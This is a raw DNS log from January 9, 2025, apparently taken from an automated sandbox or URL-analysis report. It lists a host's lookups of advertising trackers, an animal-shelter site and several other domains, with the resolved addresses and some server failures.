                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.381262064 CET192.168.2.41.1.1.10x1d9Standard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.382121086 CET192.168.2.41.1.1.10x96b7Standard query (0)stats.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.408108950 CET192.168.2.41.1.1.10x37a2Standard query (0)td.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.408480883 CET192.168.2.41.1.1.10xdc21Standard query (0)td.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.484005928 CET192.168.2.41.1.1.10x4166Standard query (0)indyhumane.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.484183073 CET192.168.2.41.1.1.10xa542Standard query (0)indyhumane.org65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.489969969 CET192.168.2.41.1.1.10x4f66Standard query (0)up.pixel.adA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.490179062 CET192.168.2.41.1.1.10xe641Standard query (0)up.pixel.ad65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.559103012 CET192.168.2.41.1.1.10x5de2Standard query (0)insiderdata360online.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.559585094 CET192.168.2.41.1.1.10x4536Standard query (0)insiderdata360online.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.786525965 CET192.168.2.41.1.1.10xcd7cStandard query (0)pixel.sitescout.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.786653996 CET192.168.2.41.1.1.10x457bStandard query (0)pixel.sitescout.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.796179056 CET192.168.2.41.1.1.10x6c91Standard query (0)pixel-sync.sitescout.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.796312094 CET192.168.2.41.1.1.10xd7dStandard query (0)pixel-sync.sitescout.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.008996964 CET192.168.2.41.1.1.10xb523Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.009324074 CET192.168.2.41.1.1.10xd5f6Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.357268095 CET192.168.2.41.1.1.10x7238Standard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.357606888 CET192.168.2.41.1.1.10x1799Standard query (0)stats.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.817920923 CET192.168.2.41.1.1.10x7c32Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.818130970 CET192.168.2.41.1.1.10xda35Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.128201008 CET192.168.2.41.1.1.10xd646Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.128895998 CET192.168.2.41.1.1.10x6809Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.129544020 CET192.168.2.41.1.1.10x6ac2Standard query (0)pixel.tapad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.130217075 CET192.168.2.41.1.1.10xba8dStandard query (0)pixel.tapad.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.130609989 CET192.168.2.41.1.1.10x54faStandard query (0)loadm.exelator.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.131002903 CET192.168.2.41.1.1.10x9e6eStandard query (0)loadm.exelator.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.131541014 CET192.168.2.41.1.1.10x4b63Standard query (0)idsync.rlcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.131858110 CET192.168.2.41.1.1.10x3a4bStandard query (0)idsync.rlcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.132697105 CET192.168.2.41.1.1.10xfe4fStandard query (0)sync.crwdcntrl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.132987976 CET192.168.2.41.1.1.10xa6a9Standard query (0)sync.crwdcntrl.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.537199974 CET192.168.2.41.1.1.10xf222Standard query (0)pixel.sitescout.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.537199974 CET192.168.2.41.1.1.10xa684Standard query (0)pixel.sitescout.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.048851013 CET192.168.2.41.1.1.10x49ccStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.049063921 CET192.168.2.41.1.1.10x352dStandard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.055231094 CET192.168.2.41.1.1.10x4238Standard query (0)virtual.urban-orthodontics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.055464029 CET192.168.2.41.1.1.10xb9acStandard query (0)virtual.urban-orthodontics.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.548376083 CET192.168.2.41.1.1.10x135fStandard query (0)pixel.tapad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.548496962 CET192.168.2.41.1.1.10x70cbStandard query (0)pixel.tapad.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.931139946 CET192.168.2.41.1.1.10xb65aStandard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.931360960 CET192.168.2.41.1.1.10xbfc2Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:20.145210981 CET192.168.2.41.1.1.10x21c8Standard query (0)sync.crwdcntrl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:20.145428896 CET192.168.2.41.1.1.10x144dStandard query (0)sync.crwdcntrl.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:21.965790033 CET192.168.2.41.1.1.10x642eStandard query (0)virtual.urban-orthodontics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:21.966068029 CET192.168.2.41.1.1.10xec3cStandard query (0)virtual.urban-orthodontics.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:23.462887049 CET192.168.2.41.1.1.10x6fafStandard query (0)insiderdata360online.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:23.463036060 CET192.168.2.41.1.1.10x1c58Standard query (0)insiderdata360online.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:23.474550962 CET192.168.2.41.1.1.10x6797Standard query (0)insiderdata360online.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:23.945571899 CET192.168.2.41.1.1.10x249dStandard query (0)insiderdata360online.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:23.954368114 CET192.168.2.41.1.1.10xbb95Standard query (0)insiderdata360online.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:24.520136118 CET192.168.2.41.1.1.10x7ed4Standard query (0)insiderdata360online.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:24.520298004 CET192.168.2.41.1.1.10xde50Standard query (0)insiderdata360online.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:24.527461052 CET192.168.2.41.1.1.10x8580Standard query (0)insiderdata360online.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:24.527653933 CET192.168.2.41.1.1.10x5717Standard query (0)insiderdata360online.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.860204935 CET192.168.2.41.1.1.10x7597Standard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.860204935 CET192.168.2.41.1.1.10xa1c7Standard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.861592054 CET192.168.2.41.1.1.10x87d6Standard query (0)fei.pro-market.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.861771107 CET192.168.2.41.1.1.10x5e99Standard query (0)fei.pro-market.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.863091946 CET192.168.2.41.1.1.10xf794Standard query (0)image2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.863091946 CET192.168.2.41.1.1.10x9655Standard query (0)image2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.865011930 CET192.168.2.41.1.1.10x4fe0Standard query (0)us-u.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.865011930 CET192.168.2.41.1.1.10xcfa8Standard query (0)us-u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.866240025 CET192.168.2.41.1.1.10x3b51Standard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.866723061 CET192.168.2.41.1.1.10x79dbStandard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:26.699171066 CET192.168.2.41.1.1.10x1d91Standard query (0)fei.pro-market.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:26.699397087 CET192.168.2.41.1.1.10xfbeStandard query (0)fei.pro-market.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:26.753353119 CET192.168.2.41.1.1.10xb986Standard query (0)image2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:26.753531933 CET192.168.2.41.1.1.10x549eStandard query (0)image2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:26.839133978 CET192.168.2.41.1.1.10x7bc4Standard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:26.839273930 CET192.168.2.41.1.1.10xd70bStandard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:27.262413025 CET192.168.2.41.1.1.10x7dd8Standard query (0)us-u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:27.262605906 CET192.168.2.41.1.1.10x436fStandard query (0)us-u.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:27.776535988 CET192.168.2.41.1.1.10x7edaStandard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:27.776791096 CET192.168.2.41.1.1.10xf7edStandard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:46.275270939 CET192.168.2.41.1.1.10x97c3Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:46.275501013 CET192.168.2.41.1.1.10xd78cStandard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:47.989757061 CET192.168.2.41.1.1.10xd5bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:47.989870071 CET192.168.2.41.1.1.10xf2f4Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:50.576375008 CET192.168.2.41.1.1.10xe96bStandard query (0)insiderdata360online.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:04.628916979 CET1.1.1.1192.168.2.40x570fNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:04.629430056 CET1.1.1.1192.168.2.40xee16No error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:06.095966101 CET1.1.1.1192.168.2.40x37cfNo error (0)indyhumane.org199.16.172.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:06.095966101 CET1.1.1.1192.168.2.40x37cfNo error (0)indyhumane.org199.16.173.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:06.714639902 CET1.1.1.1192.168.2.40xa699No error (0)indyhumane.org199.16.172.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:06.714639902 CET1.1.1.1192.168.2.40xa699No error (0)indyhumane.org199.16.173.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:08.664789915 CET1.1.1.1192.168.2.40xee78No error (0)149955744.v2.pressablecdn.com192.0.77.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:08.871326923 CET1.1.1.1192.168.2.40xae85No error (0)g.petango.comafd-ppmediaprd-afc3dtdza9hyg3bv.a03.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:08.871326923 CET1.1.1.1192.168.2.40xae85No error (0)afd-ppmediaprd-afc3dtdza9hyg3bv.a03.azurefd.netshed.dual-low.s-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:08.871326923 CET1.1.1.1192.168.2.40xae85No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:08.871326923 CET1.1.1.1192.168.2.40xae85No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:08.880142927 CET1.1.1.1192.168.2.40xde14No error (0)g.petango.comafd-ppmediaprd-afc3dtdza9hyg3bv.a03.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:08.880142927 CET1.1.1.1192.168.2.40xde14No error (0)afd-ppmediaprd-afc3dtdza9hyg3bv.a03.azurefd.netshed.dual-low.s-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.988311052 CET1.1.1.1192.168.2.40xcd59No error (0)g.petango.comafd-ppmediaprd-afc3dtdza9hyg3bv.a03.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.988311052 CET1.1.1.1192.168.2.40xcd59No error (0)afd-ppmediaprd-afc3dtdza9hyg3bv.a03.azurefd.netshed.dual-low.s-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.988311052 CET1.1.1.1192.168.2.40xcd59No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:09.988311052 CET1.1.1.1192.168.2.40xcd59No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.004627943 CET1.1.1.1192.168.2.40xd922No error (0)g.petango.comafd-ppmediaprd-afc3dtdza9hyg3bv.a03.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.004627943 CET1.1.1.1192.168.2.40xd922No error (0)afd-ppmediaprd-afc3dtdza9hyg3bv.a03.azurefd.netshed.dual-low.s-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:10.022829056 CET1.1.1.1192.168.2.40x2986No error (0)149955744.v2.pressablecdn.com192.0.77.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:11.884907007 CET1.1.1.1192.168.2.40x8cf3No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:11.884907007 CET1.1.1.1192.168.2.40x8cf3No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:11.884907007 CET1.1.1.1192.168.2.40x8cf3No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:11.884907007 CET1.1.1.1192.168.2.40x8cf3No error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:12.430078983 CET1.1.1.1192.168.2.40x250aNo error (0)cdn.customgpt.aid23d3wcthtl67x.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:12.440676928 CET1.1.1.1192.168.2.40x3ebfNo error (0)cdn.customgpt.aid23d3wcthtl67x.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:12.440676928 CET1.1.1.1192.168.2.40x3ebfNo error (0)d23d3wcthtl67x.cloudfront.net65.9.66.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:12.440676928 CET1.1.1.1192.168.2.40x3ebfNo error (0)d23d3wcthtl67x.cloudfront.net65.9.66.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:12.440676928 CET1.1.1.1192.168.2.40x3ebfNo error (0)d23d3wcthtl67x.cloudfront.net65.9.66.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:12.440676928 CET1.1.1.1192.168.2.40x3ebfNo error (0)d23d3wcthtl67x.cloudfront.net65.9.66.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.014867067 CET1.1.1.1192.168.2.40xde6eNo error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.014867067 CET1.1.1.1192.168.2.40xde6eNo error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.014867067 CET1.1.1.1192.168.2.40xde6eNo error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.014867067 CET1.1.1.1192.168.2.40xde6eNo error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.507977962 CET1.1.1.1192.168.2.40x718Server failure (2)insiderdata360online.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.562819958 CET1.1.1.1192.168.2.40x4c0No error (0)cdn.customgpt.aid23d3wcthtl67x.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.562958956 CET1.1.1.1192.168.2.40x9c55No error (0)cdn.customgpt.aid23d3wcthtl67x.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.562958956 CET1.1.1.1192.168.2.40x9c55No error (0)d23d3wcthtl67x.cloudfront.net65.9.66.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.562958956 CET1.1.1.1192.168.2.40x9c55No error (0)d23d3wcthtl67x.cloudfront.net65.9.66.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.562958956 CET1.1.1.1192.168.2.40x9c55No error (0)d23d3wcthtl67x.cloudfront.net65.9.66.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.562958956 CET1.1.1.1192.168.2.40x9c55No error (0)d23d3wcthtl67x.cloudfront.net65.9.66.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:13.860346079 CET1.1.1.1192.168.2.40x9e4eNo error (0)leatherbook.org185.121.15.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:14.861385107 CET1.1.1.1192.168.2.40x8f77No error (0)secure.gaug.esgaug.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:14.861385107 CET1.1.1.1192.168.2.40x8f77No error (0)gaug.es44.219.163.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:14.861385107 CET1.1.1.1192.168.2.40x8f77No error (0)gaug.es3.221.201.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:14.861385107 CET1.1.1.1192.168.2.40x8f77No error (0)gaug.es34.195.109.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:14.861435890 CET1.1.1.1192.168.2.40x56f8No error (0)secure.gaug.esgaug.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.055862904 CET1.1.1.1192.168.2.40x6f5dNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.055862904 CET1.1.1.1192.168.2.40x6f5dNo error (0)scontent.xx.fbcdn.net157.240.0.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.055875063 CET1.1.1.1192.168.2.40xe6ccNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.055875063 CET1.1.1.1192.168.2.40xe6ccNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.055875063 CET1.1.1.1192.168.2.40xe6ccNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.165000916 CET1.1.1.1192.168.2.40x2345No error (0)up.pixel.adcentro.vo.llnwd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.165205956 CET1.1.1.1192.168.2.40x9a9cNo error (0)up.pixel.adcentro.vo.llnwd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.165205956 CET1.1.1.1192.168.2.40x9a9cNo error (0)centro.vo.llnwd.net41.63.96.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.540476084 CET1.1.1.1192.168.2.40x2285Server failure (2)insiderdata360online.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.574989080 CET1.1.1.1192.168.2.40xe573No error (0)leatherbook.org185.121.15.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.673238993 CET1.1.1.1192.168.2.40xcbefNo error (0)secure.gaug.esgaug.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.673238993 CET1.1.1.1192.168.2.40xcbefNo error (0)gaug.es44.219.163.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.673238993 CET1.1.1.1192.168.2.40xcbefNo error (0)gaug.es34.195.109.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.673238993 CET1.1.1.1192.168.2.40xcbefNo error (0)gaug.es3.221.201.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.685004950 CET1.1.1.1192.168.2.40x6877No error (0)secure.gaug.esgaug.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.818975925 CET1.1.1.1192.168.2.40xef02No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.819130898 CET1.1.1.1192.168.2.40xf8b5No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.877379894 CET1.1.1.1192.168.2.40x7bd7No error (0)virtual.urban-orthodontics.com185.76.79.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.962450027 CET1.1.1.1192.168.2.40x5af0Server failure (2)insiderdata360online.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:15.962836981 CET1.1.1.1192.168.2.40x4d4Server failure (2)insiderdata360online.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.385905981 CET1.1.1.1192.168.2.40x6f20No error (0)analytics.google.comanalytics-alv.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.385905981 CET1.1.1.1192.168.2.40x6f20No error (0)analytics-alv.google.com216.239.32.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.385905981 CET1.1.1.1192.168.2.40x6f20No error (0)analytics-alv.google.com216.239.36.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.385905981 CET1.1.1.1192.168.2.40x6f20No error (0)analytics-alv.google.com216.239.38.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.385905981 CET1.1.1.1192.168.2.40x6f20No error (0)analytics-alv.google.com216.239.34.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.386441946 CET1.1.1.1192.168.2.40x4aNo error (0)analytics.google.comanalytics-alv.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.388051033 CET1.1.1.1192.168.2.40x1d9No error (0)stats.g.doubleclick.net173.194.76.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.388051033 CET1.1.1.1192.168.2.40x1d9No error (0)stats.g.doubleclick.net173.194.76.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.388051033 CET1.1.1.1192.168.2.40x1d9No error (0)stats.g.doubleclick.net173.194.76.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.388051033 CET1.1.1.1192.168.2.40x1d9No error (0)stats.g.doubleclick.net173.194.76.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.414971113 CET1.1.1.1192.168.2.40x37a2No error (0)td.doubleclick.net142.250.181.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.495013952 CET1.1.1.1192.168.2.40x4166No error (0)indyhumane.org199.16.172.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.495013952 CET1.1.1.1192.168.2.40x4166No error (0)indyhumane.org199.16.173.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.501636028 CET1.1.1.1192.168.2.40xe641No error (0)up.pixel.adcentro.vo.llnwd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.502069950 CET1.1.1.1192.168.2.40x4f66No error (0)up.pixel.adcentro.vo.llnwd.netCNAME (Canonical name)IN (0x0001)false
